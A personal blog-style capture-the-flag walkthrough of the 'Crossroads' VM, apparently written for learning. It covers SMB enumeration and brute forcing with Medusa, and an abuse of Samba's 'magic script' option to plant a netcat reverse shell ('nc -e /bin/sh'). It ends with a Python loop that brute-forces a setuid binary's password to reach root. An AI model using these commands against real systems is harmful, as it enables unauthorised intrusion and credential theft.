crossroads walk-through


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium

I had to copy python script from other people and it took me sometime to troubleshoot.


You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0

We came to know our target or victim machine IP:

nmap -sC -sV -p- -Pn -o nmap.log

Output: (Information redacted)

# Nmap 7.91 scan initiated Sun May 30 08:10:34 2021 as: nmap -sC -sV -p- -Pn -o nmap.log
Nmap scan report for
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2021-05-29T21:40:49-05:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02:

I didn’t get anything useful through exiftool (metadata)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x php,txt,html,bak -o gobuster.log

Ok, based on nmap result, we got, the system is running SMB protocol, so let’s do some enumeration

Enumerate SMB Protocol

 nmap --script smb-vuln* -p 139,445 -o nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 08:30 IST
Nmap scan report for
137/tcp closed netbios-ns
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
enum4linux -A


User: albert

Let’s do a bruteforce and try our luck 😉

Brute Force Method 1: (working)

medusa -h -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

ACCOUNT FOUND: [smbnt] Host: User: albert Password: bradley1 [SUCCESS (ADMIN$ – Share Unavailable)]


Brute Force Method 2: (not fixed yet.)

hydra -l albert -P /usr/share/wordlists/rockyou.txt smb

nmap -p445 –script smb-brute –script-args userdb=albert,passdb=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

nmap -p 135,139,445 --script smb-pwdump --script-args-smbuser=USERNAME,smbpass=PASSWORD <Target>



smbclient // -U albert

Password: bradley1

Note: You can use get filename to download all the files you want.

We got the first flag:

I got stuck here. So I need to figure out what I need to do with the information I got so far (if the information is not enough I need to dig more which means enumerate more)

I read the entire smb.conf and only thing which I feel fishy (or favorable to us is this line)


path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no

To be honest, I am not sure what it is, so had to google it.  I got a perfect link. If you do not want to read the entire blog. Following line is enough for us

magic script

If the

option is set to a filename and the client creates a file by that name in that share, Samba will run the file as soon as the user has opened and closed it. For example, let’s assume that the following option was created in the share

	magic script = tally.sh

Samba continually monitors the files in that share. If one by the name of tally.sh is closed (after being opened) by a user, Samba will execute the contents of that file locally. The file will be passed to the shell to execute; it must therefore be a legal Unix shell script. This means that it must have newline characters as line endings instead of Windows CR/LFs. In addition, it helps if you use the
directive at the beginning of the file to indicate under which shell the script should run.


So what I want to do now is to upload a reverse shell /home/albert/smbshare  magic script = smbscript.sh

On Kali Linux

vim smbscript.sh

nc -e /bin/sh 1234

On one Terminal type:

nc -lvp 1234

Let’s connect to the smbshare now.  (as soon as you put the script, you will receipt the reverse connection)

smbclient // -U albert

Password: bradley1

put smbscript.sh

Post Exploitation

python3 -c "import pty;pty.spawn('/bin/bash')";

export TERM=xterm


I have uploaded the linpeas.sh at the /tmp of victim machine.

-rwsr-xr-x 1 root root 17K Mar 2 17:02 /home/albert/beroot 
file beroot
beroot: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c1da1f0fded1889d32e27b99a2a4bd170c30349b, for GNU/Linux 3.2.0, not stripped
xxd beroot

/bin/bash /root/beroot.sh

I can sense that this binary is performing the above command. But I am not sure what beroot is, so I did a google.


“BeRoot is a post exploitation tool to check common misconfigurations on Window, Linux and Mac OS to find a way to escalate our privilege.”

./beroot   # asks password for the root

Yes, since it is asking a password for the root. Let’s upload rockyou.txt into the victim machine and bruteforce the beroot binary.

source code: 1 2

import subprocess

passList = open('rockyou.txt', 'r', encoding = "ISO-8859-1").readlines()
#with open('rockyou.txt', 'r') as f:
# passList = f.readlines() 
for passwd in passList:
    response = subprocess.getoutput('echo "{}" | ./beroot'.format(passwd))
    if 'wrong password!!!' not in response:
        print('Password found: {}'.format(passwd))
if 'wrong password!!!' not in response:
    print("This is the output: \n{}".format(response))

cat rootcreds

I tried to provide the password for ./beroot but it was not accepting so I thought why not try to switch to root user with the password …

su - root



cat root.txt

I am going to buy vegetables now as the market is going to close soon (because of COVID).. Anyway, wish you have a happy weekend 🙂






Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Back to top button